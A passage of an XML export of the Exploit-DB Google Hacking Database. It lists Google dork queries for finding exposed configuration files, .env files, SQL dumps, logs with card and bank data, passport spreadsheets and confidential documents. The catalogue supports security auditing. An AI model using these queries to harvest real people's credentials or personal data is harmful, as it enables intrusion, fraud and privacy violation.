<shortDescription>&quot;index of&quot; &quot;user.MYD&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;user.MYD&quot;
# Title: Disclosure of sensitive files.
# Date: 15/08/2020
# Author: Sahil Saxena
# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174
# Twitter: https://twitter.com/Sahil_delinitor
# GitHub: https://github.com/Sahil-69
# Bugcrowd: https://bugcrowd.com/Prickn
Thanks,
Sahil Saxena
</textualDescription>
<query>&quot;index of&quot; &quot;user.MYD&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;user.MYD&quot;</querystring>
<edb></edb>
<date>2020-08-17</date>
<author>Sahil Saxena</author>
</entry>
<entry>
<id>6224</id>
<link>https://www.exploit-db.com/ghdb/6224</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;user.sqlite&quot;</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; &quot;user.sqlite&quot;
# Title: SQLite files disclosure.
# Date: 04/06/2020
# Author: Shivani Kumari
# LinkedIn: https://www.linkedin.com/in/shivani1337/
# Twitter: https://twitter.com/Shivani1337
# GitHub: https://github.com/Shivani1337
# Bugcrowd: https://bugcrowd.com/Shivani1337
_
Thank you,
Shivani Kumari
</textualDescription>
<query>&quot;index of&quot; &quot;user.sqlite&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;user.sqlite&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Shivani Kumari</author>
</entry>
<entry>
<id>6066</id>
<link>https://www.exploit-db.com/ghdb/6066</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; &quot;wp-config.zip&quot;</shortDescription>
<textualDescription>Dork: &quot;index of&quot; &quot;wp-config.zip&quot;
Description: This Google dork can be used to discover publicly available
ZIP files containing wp-config.php file which has sensitive WordPress
information.
Author: Jinson Varghese Behanan (@JinsonCyberSec)
Author Homepage: https://www.jinsonvarghese.com
</textualDescription>
<query>&quot;index of&quot; &quot;wp-config.zip&quot;</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; &quot;wp-config.zip&quot;</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Jinson Varghese Behanan</author>
</entry>
<entry>
<id>155</id>
<link>https://www.exploit-db.com/ghdb/155</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Index of&quot; / &quot;chat/logs&quot;</shortDescription>
<textualDescription>This search reveals chat logs. Depending on the contents of the logs, these files could contain just about anything!</textualDescription>
<query>&quot;Index of&quot; / &quot;chat/logs&quot;</query>
<querystring>https://www.google.com/search?q=%22Index+of%22+%2F+%22chat%2Flogs%22+</querystring>
<edb></edb>
<date>2004-04-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>6209</id>
<link>https://www.exploit-db.com/ghdb/6209</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; /ftp/logs</shortDescription>
<textualDescription># Title: Finding potential log files.
# Google Dork: &quot;index of&quot; /ftp/logs
# Date: 04/06/2020
# Author: Ritik Sahni
</textualDescription>
<query>&quot;index of&quot; /ftp/logs</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; /ftp/logs</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Ritik Sahni</author>
</entry>
<entry>
<id>6210</id>
<link>https://www.exploit-db.com/ghdb/6210</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; /private/logs</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; /private/logs
# Title: Finding potential log files.
# Date: 04/06/2020
# Author: Ritik Sahni
</textualDescription>
<query>&quot;index of&quot; /private/logs</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; /private/logs</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Ritik Sahni</author>
</entry>
<entry>
<id>7908</id>
<link>https://www.exploit-db.com/ghdb/7908</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; :.env</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; :.env
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>&quot;index of&quot; :.env</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; :.env</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7907</id>
<link>https://www.exploit-db.com/ghdb/7907</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; :.py</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; :.py
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>&quot;index of&quot; :.py</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; :.py</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7714</id>
<link>https://www.exploit-db.com/ghdb/7714</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; :excel documents</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; :excel documents
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Renuka Kharat</textualDescription>
<query>&quot;index of&quot; :excel documents</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; :excel documents</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Renuka Kharat</author>
</entry>
<entry>
<id>7911</id>
<link>https://www.exploit-db.com/ghdb/7911</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; filetype:db</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; filetype:db
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>&quot;index of&quot; filetype:db</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; filetype:db</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7909</id>
<link>https://www.exploit-db.com/ghdb/7909</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; filetype:env</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; filetype:env
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O</textualDescription>
<query>&quot;index of&quot; filetype:env</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; filetype:env</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7910</id>
<link>https://www.exploit-db.com/ghdb/7910</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; filetype:sql</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; filetype:sql
# Files Containing Juicy Info
# Date: 24/12/2021
# Exploit Author: Girish B O
</textualDescription>
<query>&quot;index of&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; filetype:sql</querystring>
<edb></edb>
<date>2022-06-16</date>
<author>Girish B O</author>
</entry>
<entry>
<id>7382</id>
<link>https://www.exploit-db.com/ghdb/7382</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;index of&quot; intext:wpbdp-csv-exports</shortDescription>
<textualDescription># Google Dork: &quot;index of&quot; intext:wpbdp-csv-exports
# Files Containing Juicy Info
# Date:23/09/2021
# Exploit Author: Serdar D.</textualDescription>
<query>&quot;index of&quot; intext:wpbdp-csv-exports</query>
<querystring>https://www.google.com/search?q=&quot;index of&quot; intext:wpbdp-csv-exports</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Serdar D.</author>
</entry>
<entry>
<id>3856</id>
<link>https://www.exploit-db.com/ghdb/3856</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;information_schema&quot; filetype:sql</shortDescription>
<textualDescription>Dork: &quot;information_schema&quot; filetype:sql
By: Cr4t3r
</textualDescription>
<query>&quot;information_schema&quot; filetype:sql</query>
<querystring>https://www.google.com/search?q=&quot;information_schema&quot; filetype:sql</querystring>
<edb></edb>
<date>2013-08-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>4456</id>
<link>https://www.exploit-db.com/ghdb/4456</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;InnoDB:&quot; ext:log</shortDescription>
<textualDescription>Finds MySQL error logs and the such
Dxtroyer</textualDescription>
<query>&quot;InnoDB:&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;InnoDB:&quot; ext:log</querystring>
<edb></edb>
<date>2017-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>573</id>
<link>https://www.exploit-db.com/ghdb/573</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Installed Objects Scanner&quot; inurl:default.asp</shortDescription>
<textualDescription>Installed Objects Scanner makes it easy to test your IIS Webserver for installed components. Installed Objects Scanner also has descriptions and links for many components to let you know more on how using those components. Just place the script on your server and view it in your browser to check your server for all currently known components.</textualDescription>
<query>&quot;Installed Objects Scanner&quot; inurl:default.asp</query>
<querystring>https://www.google.com/search?q=%22Installed+Objects+Scanner%22+inurl%3Adefault.asp++</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>8105</id>
<link>https://www.exploit-db.com/ghdb/8105</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;intitle:index of wp-content/plugins/wp-mail-smtp/&quot;</shortDescription>
<textualDescription># Google Dork: &quot;intitle:index of wp-content/plugins/wp-mail-smtp/&quot;
# Files Containing Juicy Info
# Date:09/03/2023
# Exploit Author: Ishwar Kumar</textualDescription>
<query>Re: New Dork Submission for Google Hacking Database !!</query>
<querystring>https://www.google.com/search?q=Re: New Dork Submission for Google Hacking Database !!</querystring>
<edb></edb>
<date>2023-03-09</date>
<author>Ishwar Kumar</author>
</entry>
<entry>
<id>8315</id>
<link>https://www.exploit-db.com/ghdb/8315</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;intitle:index of wp-content/plugins/wp-mail-smtp/&quot;</shortDescription>
<textualDescription># Google Dork: &quot;intitle:index of wp-content/plugins/wp-mail-smtp/&quot;
# Files Containing Juicy Info
# Date: 02/11/2023
# Exploit: Ishwar Kumar</textualDescription>
<query>Re: New Dork Submission for Google Hacking Database !!</query>
<querystring>https://www.google.com/search?q=Re: New Dork Submission for Google Hacking Database !!</querystring>
<edb></edb>
<date>2023-11-02</date>
<author>Ishwar Kumar</author>
</entry>
<entry>
<id>7531</id>
<link>https://www.exploit-db.com/ghdb/7531</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;inurl:php?id=&quot; site:.com</shortDescription>
<textualDescription># Google Dork: &quot;inurl:php?id=&quot; site:.com
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: MD. Rimel</textualDescription>
<query>&quot;inurl:php?id=&quot; site:.com</query>
<querystring>https://www.google.com/search?q=&quot;inurl:php?id=&quot; site:.com</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>MD. Rimel</author>
</entry>
<entry>
<id>7525</id>
<link>https://www.exploit-db.com/ghdb/7525</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;inurl:php?id=&quot; site:.gov.bd</shortDescription>
<textualDescription># Google Dork: &quot;inurl:php?id=&quot; site:.gov.bd
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: MD. Rimel</textualDescription>
<query>&quot;inurl:php?id=&quot; site:.gov.bd</query>
<querystring>https://www.google.com/search?q=&quot;inurl:php?id=&quot; site:.gov.bd</querystring>
<edb></edb>
<date>2021-10-29</date>
<author>MD. Rimel</author>
</entry>
<entry>
<id>5209</id>
<link>https://www.exploit-db.com/ghdb/5209</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;keyed alike&quot; site:gov filetype:pdf</shortDescription>
<textualDescription>Description: Find what city governments in the US are using keyed alike
police cruisers and miscellaneous types of locks.
Author: edm0nd https://twitter.com/edmond_major
</textualDescription>
<query>&quot;keyed alike&quot; site:gov filetype:pdf</query>
<querystring>https://www.google.com/search?q=&quot;keyed alike&quot; site:gov filetype:pdf</querystring>
<edb></edb>
<date>2019-05-13</date>
<author>edm0nd</author>
</entry>
<entry>
<id>4512</id>
<link>https://www.exploit-db.com/ghdb/4512</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;KVP_ENCDATA:Version=1.0&quot; ext:log</shortDescription>
<textualDescription>Finds transaction logs with bank account info and (drumroll please) credit
card numbers!
Dxtroyer</textualDescription>
<query>&quot;KVP_ENCDATA:Version=1.0&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;KVP_ENCDATA:Version=1.0&quot; ext:log</querystring>
<edb></edb>
<date>2017-06-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>4443</id>
<link>https://www.exploit-db.com/ghdb/4443</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;LGD_CARDNUM&quot; ext:log -site:camper.com</shortDescription>
<textualDescription>Find partial credit card numbers, bank account info, and more!
Dxtroyer</textualDescription>
<query>&quot;LGD_CARDNUM&quot; ext:log -site:camper.com</query>
<querystring>https://www.google.com/search?q=&quot;LGD_CARDNUM&quot; ext:log -site:camper.com</querystring>
<edb></edb>
<date>2017-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>4444</id>
<link>https://www.exploit-db.com/ghdb/4444</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Logfile of Trend Micro HijackThis&quot; ext:log</shortDescription>
<textualDescription>Finds AV logs from Trend Micro
Dxtroyer</textualDescription>
<query>&quot;Logfile of Trend Micro HijackThis&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;Logfile of Trend Micro HijackThis&quot; ext:log</querystring>
<edb></edb>
<date>2017-04-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>944</id>
<link>https://www.exploit-db.com/ghdb/944</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;MacHTTP&quot; filetype:log inurl:machttp.log</shortDescription>
<textualDescription>MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access.</textualDescription>
<query>&quot;MacHTTP&quot; filetype:log inurl:machttp.log</query>
<querystring>https://www.google.com/search?q=%22MacHTTP%22+filetype%3Alog+inurl%3Amachttp.log</querystring>
<edb></edb>
<date>2005-04-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>5677</id>
<link>https://www.exploit-db.com/ghdb/5677</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;MailChimp API error:&quot; ext:log</shortDescription>
<textualDescription># Google Dork: &quot;MailChimp API error:&quot; ext:log
# Date: 12.28.2019
# Author: Michael Meade</textualDescription>
<query>&quot;MailChimp API error:&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;MailChimp API error:&quot; ext:log</querystring>
<edb></edb>
<date>2019-12-30</date>
<author>Michael Meade</author>
</entry>
<entry>
<id>244</id>
<link>https://www.exploit-db.com/ghdb/244</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Mecury Version&quot; &quot;Infastructure Group&quot;</shortDescription>
<textualDescription>Mecury is a centralized ground control program for research satellites. This query simply locates servers running this software. As it seems to run primarily on PHP and MySQL, there are many possible vulnerabilities associated with it.</textualDescription>
<query>&quot;Mecury Version&quot; &quot;Infastructure Group&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;q=%22Mercury+Version%22+%22Infrastructure+Group%22&amp;spell=1</querystring>
<edb></edb>
<date>2004-05-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>698</id>
<link>https://www.exploit-db.com/ghdb/698</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)&quot; ext:log</shortDescription>
<textualDescription>This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well.</textualDescription>
<query>&quot;Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)&quot; ext:log</query>
<querystring>https://www.google.com/search?q=%22Microsoft+%28R%29+Windows+*+%28TM%29+Version+*+DrWtsn32+Copyright+%28C%29%22+ext%3Alog</querystring>
<edb></edb>
<date>2004-11-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>6232</id>
<link>https://www.exploit-db.com/ghdb/6232</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;microsoft internet information services&quot; ext:log</shortDescription>
<textualDescription>Files containing juicy info:
&quot;microsoft internet information services&quot; ext:log
BR,
Reza Abasi(Turku)
</textualDescription>
<query>&quot;microsoft internet information services&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;microsoft internet information services&quot; ext:log</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>4501</id>
<link>https://www.exploit-db.com/ghdb/4501</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;MiniToolBox by Farbar&quot; ext:txt</shortDescription>
<textualDescription>Finds logs with IP configuration, DNS info, application errors, and more!
Dxtroyer</textualDescription>
<query>&quot;MiniToolBox by Farbar&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;MiniToolBox by Farbar&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>136</id>
<link>https://www.exploit-db.com/ghdb/136</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Most Submitted Forms and Scripts&quot; &quot;this section&quot;</shortDescription>
<textualDescription>More www statistics on the web. This one is very nice.. Lots of directory info, and client access statistics, email addresses.. lots of good stuff.These are SOOO dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...</textualDescription>
<query>&quot;Most Submitted Forms and Scripts&quot; &quot;this section&quot;</query>
<querystring>https://www.google.com/search?q=%22Most+Submitted+Forms+and+Scripts%22+%22this+section%22</querystring>
<edb></edb>
<date>2004-03-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>146</id>
<link>https://www.exploit-db.com/ghdb/146</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Network Vulnerability Assessment Report&quot;</shortDescription>
<textualDescription>This search yeids vulnerability scanner reports, revealing potential vulnerabilities on hosts and networks. Even if some of the vulnerabilities have been fixed, information about the network/hosts can still be gleaned.</textualDescription>
<query>&quot;Network Vulnerability Assessment Report&quot;</query>
<querystring>https://www.google.com/search?q=%22Network+Vulnerability+Assessment+Report%22</querystring>
<edb></edb>
<date>2004-03-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>139</id>
<link>https://www.exploit-db.com/ghdb/139</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;not for distribution&quot; confidential</shortDescription>
<textualDescription>The terms &quot;not for distribution&quot; and confidential indicate a sensitive document. Results vary wildly, but web-based documents are for public viewing, and should neither be considered confidential or private.</textualDescription>
<query>&quot;not for distribution&quot; confidential</query>
<querystring>https://www.google.com/search?q=%22not+for+distribution%22+confidential</querystring>
<edb></edb>
<date>2004-03-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>7045</id>
<link>https://www.exploit-db.com/ghdb/7045</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Not for Public Release&quot; + &quot;Confidential&quot; ext:pdf | ext:doc | ext:xlsx</shortDescription>
<textualDescription># Google Dork: &quot;Not for Public Release&quot; + &quot;Confidential&quot; ext:pdf | ext:doc
| ext:xlsx
# Files containing juicy info.
# Date: 8/08/2021
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>&quot;Not for Public Release&quot; + &quot;Confidential&quot; ext:pdf | ext:doc | ext:xlsx</query>
<querystring>https://www.google.com/search?q=&quot;Not for Public Release&quot; + &quot;Confidential&quot; ext:pdf | ext:doc | ext:xlsx</querystring>
<edb></edb>
<date>2021-08-12</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1265</id>
<link>https://www.exploit-db.com/ghdb/1265</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;not for public release&quot; -.edu -.gov -.mil</shortDescription>
<textualDescription>if you search through lots of these then you find some really juicy things, there files from police, airports, government companies all kind of stuff that is not meant to be seen by normal people.</textualDescription>
<query>&quot;not for public release&quot; -.edu -.gov -.mil</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=%22not+for+public+release%22+-.edu+-.gov+-.mil</querystring>
<edb></edb>
<date>2006-02-22</date>
<author>anonymous</author>
</entry>
<entry>
<id>4499</id>
<link>https://www.exploit-db.com/ghdb/4499</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Operating System Intel Recovery&quot; ext:txt</shortDescription>
<textualDescription>Description: Various stealers logs
Dork: &quot;Operating System Intel Recovery&quot; ext:txt
Author: scumsec</textualDescription>
<query>&quot;Operating System Intel Recovery&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;Operating System Intel Recovery&quot; ext:txt</querystring>
<edb></edb>
<date>2017-05-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>4632</id>
<link>https://www.exploit-db.com/ghdb/4632</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;OTL Extras logfile created on:&quot; ext:txt</shortDescription>
<textualDescription>Finds OTL Extras scan logs, containing valuable info about the host
Dxtroyer
</textualDescription>
<query>&quot;OTL Extras logfile created on:&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;OTL Extras logfile created on:&quot; ext:txt</querystring>
<edb></edb>
<date>2017-12-07</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>4591</id>
<link>https://www.exploit-db.com/ghdb/4591</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;OTL logfile&quot; &quot;by OldTimer&quot; ext:txt</shortDescription>
<textualDescription>Finds logs of OldTimer ListIt (main log): &quot;OTL logfile&quot; &quot;by OldTimer&quot; ext:txt
Finds logs of OldTimer ListIt (extra log): &quot;OTL Extras logfile&quot; &quot;by OldTimer&quot; ext:txt
--
Dan Peretz</textualDescription>
<query>&quot;OTL logfile&quot; &quot;by OldTimer&quot; ext:txt</query>
<querystring>https://www.google.com/search?q=&quot;OTL logfile&quot; &quot;by OldTimer&quot; ext:txt</querystring>
<edb></edb>
<date>2017-10-17</date>
<author>anonymous</author>
</entry>
<entry>
<id>6844</id>
<link>https://www.exploit-db.com/ghdb/6844</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Parent Directory&quot; AND &quot;Index of&quot; AND &quot;config.php_old&quot;</shortDescription>
<textualDescription># Google Dork: &quot;Parent Directory&quot; AND &quot;Index of&quot; AND &quot;config.php_old&quot;
# Date: 20/03/2021
# Exploit Author: Cuma KURT
# Files Containing Juicy Info
# The backup PHP config files reveal passwords and other important data.
Cuma KURT
*Ethical Hacker | Information Security Engineer
Istanbul - Turkey
</textualDescription>
<query>&quot;Parent Directory&quot; AND &quot;Index of&quot; AND &quot;config.php_old&quot;</query>
<querystring>https://www.google.com/search?q=&quot;Parent Directory&quot; AND &quot;Index of&quot; AND &quot;config.php_old&quot;</querystring>
<edb></edb>
<date>2021-03-22</date>
<author>Cuma KURT</author>
</entry>
<entry>
<id>5197</id>
<link>https://www.exploit-db.com/ghdb/5197</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;passport&quot; filetype:xls site:&quot;*.edu.*&quot; | site:&quot;*.gov.*&quot; | site:&quot;*.com.*&quot; | site:&quot;*.org.*&quot; | site:&quot;*.net.*&quot; | site:&quot;*.mil.*&quot;</shortDescription>
<textualDescription># Exploit Title: [Leaking Passport details]
# Google Dork: [&quot;passport&quot; filetype:xls site:&quot;*.edu.*&quot; | site:&quot;*.gov.*&quot; | site:&quot;*.com.*&quot; | site:&quot;*.org.*&quot; | site:&quot;*.net.*&quot; | site:&quot;*.mil.*&quot;]
# Date: [April 29 2019]
# Exploit Author: [Neat - MrMeterpreter]</textualDescription>
<query>&quot;passport&quot; filetype:xls site:&quot;*.edu.*&quot; | site:&quot;*.gov.*&quot; | site:&quot;*.com.*&quot; | site:&quot;*.org.*&quot; | site:&quot;*.net.*&quot; | site:&quot;*.mil.*&quot;</query>
<querystring>https://www.google.com/search?q=&quot;passport&quot; filetype:xls site:&quot;*.edu.*&quot; | site:&quot;*.gov.*&quot; | site:&quot;*.com.*&quot; | site:&quot;*.org.*&quot; | site:&quot;*.net.*&quot; | site:&quot;*.mil.*&quot;</querystring>
<edb></edb>
<date>2019-04-30</date>
<author>Neat</author>
</entry>
<entry>
<id>4416</id>
<link>https://www.exploit-db.com/ghdb/4416</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;PGP SIGNED MESSAGE-----&quot; inurl:&quot;md5sums&quot;</shortDescription>
<textualDescription>FInds sums (MD5, SHA1, etc) that people don't want you to see!
Dxtroyer</textualDescription>
<query>&quot;PGP SIGNED MESSAGE-----&quot; inurl:&quot;md5sums&quot;</query>
<querystring>https://www.google.com/search?q=&quot;PGP SIGNED MESSAGE-----&quot; inurl:&quot;md5sums&quot;</querystring>
<edb></edb>
<date>2017-04-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>446</id>
<link>https://www.exploit-db.com/ghdb/446</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;phone * * *&quot; &quot;address *&quot; &quot;e-mail&quot; intitle:&quot;curriculum vitae&quot;</shortDescription>
<textualDescription>This search gives hounderd of existing curriculum vitae with names and adress. An attacker could steal identity if there is an SSN in the document.</textualDescription>
<query>&quot;phone * * *&quot; &quot;address *&quot; &quot;e-mail&quot; intitle:&quot;curriculum vitae&quot;</query>
<querystring>https://www.google.com/search?q=%22phone++*+*+*%22+%22address+*%22+%22e-mail%22+intitle:%22curriculum+vitae%22</querystring>
<edb></edb>
<date>2004-08-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>5206</id>
<link>https://www.exploit-db.com/ghdb/5206</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;php class JConfig&quot; AND inurl:configuration AND ext:&quot;bak | old | pdf | php | txt&quot;</shortDescription>
<textualDescription>Dork:
&quot;php class JConfig&quot; AND inurl:configuration AND ext:&quot;bak | old | pdf | php | txt&quot;</textualDescription>
<query>&quot;php class JConfig&quot; AND inurl:configuration AND ext:&quot;bak | old | pdf | php | txt&quot;</query>
<querystring>https://www.google.com/search?q=&quot;php class JConfig&quot; AND inurl:configuration AND ext:&quot;bak | old | pdf | php | txt&quot;</querystring>
<edb></edb>
<date>2019-05-08</date>
<author>Isaiah Puzon</author>
</entry>
<entry>
<id>4481</id>
<link>https://www.exploit-db.com/ghdb/4481</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;PHP Fatal error: require()&quot; ext:log</shortDescription>
<textualDescription>Finds PHP error logs
Dxtroyer</textualDescription>
<query>&quot;PHP Fatal error: require()&quot; ext:log</query>
<querystring>https://www.google.com/search?q=&quot;PHP Fatal error: require()&quot; ext:log</querystring>
<edb></edb>
<date>2017-05-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4349</id>
<link>https://www.exploit-db.com/ghdb/4349</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;PHP Version&quot; inurl:/php/phpinfo.php</shortDescription>
<textualDescription>This finds pages containing info about the PHP installation and is useful for reconnaissance.
Dork: &quot;PHP Version&quot; inurl:/php/phpinfo.php
-Gee</textualDescription>
<query>&quot;PHP Version&quot; inurl:/php/phpinfo.php</query>
<querystring>https://www.google.com/search?q=&quot;PHP Version&quot; inurl:/php/phpinfo.php</querystring>
<edb></edb>
<date>2016-10-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>6242</id>
<link>https://www.exploit-db.com/ghdb/6242</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;phpMyAdmin MySQL-Dump&quot; &quot;INSERT INTO&quot; -&quot;the&quot;</shortDescription>
<textualDescription># Dork: &quot;phpMyAdmin MySQL-Dump&quot; &quot;INSERT INTO&quot; -&quot;the&quot;
Thank you
Ashish More
</textualDescription>
<query>&quot;phpMyAdmin MySQL-Dump&quot; &quot;INSERT INTO&quot; -&quot;the&quot;</query>
<querystring>https://www.google.com/search?q=&quot;phpMyAdmin MySQL-Dump&quot; &quot;INSERT INTO&quot; -&quot;the&quot;</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Ashish More</author>
</entry>
<entry>
<id>98</id>
<link>https://www.exploit-db.com/ghdb/98</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;phpMyAdmin&quot; &quot;running on&quot; inurl:&quot;main.php&quot;</shortDescription>
<textualDescription>From phpmyadmin.net : &quot;phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.&quot; Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!</textualDescription>
<query>&quot;phpMyAdmin&quot; &quot;running on&quot; inurl:&quot;main.php&quot;</query>
<querystring>https://www.google.com/search?safe=off&amp;q=%22phpMyAdmin%22+%22running+on%22+inurl%3A%22main.php%22&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>41</id>
<link>https://www.exploit-db.com/ghdb/41</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;produced by getstats&quot;</shortDescription>
<textualDescription>Another web statistics package. This one originated from a google scan of an ivy league college. *sigh*There's sooo much stuff in here!</textualDescription>
<query>&quot;These statistics were produced by getstats&quot;</query>
<querystring>https://www.google.com/search?q=%22These+statistics+were+produced+by+getstats%22</querystring>
<edb></edb>
<date>2003-06-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>4530</id>
<link>https://www.exploit-db.com/ghdb/4530</link>
<category>Files Containing Juicy Info</category>
<shortDescription>&quot;Protocol=unreal&quot; ext:ini -git</shortDescription>
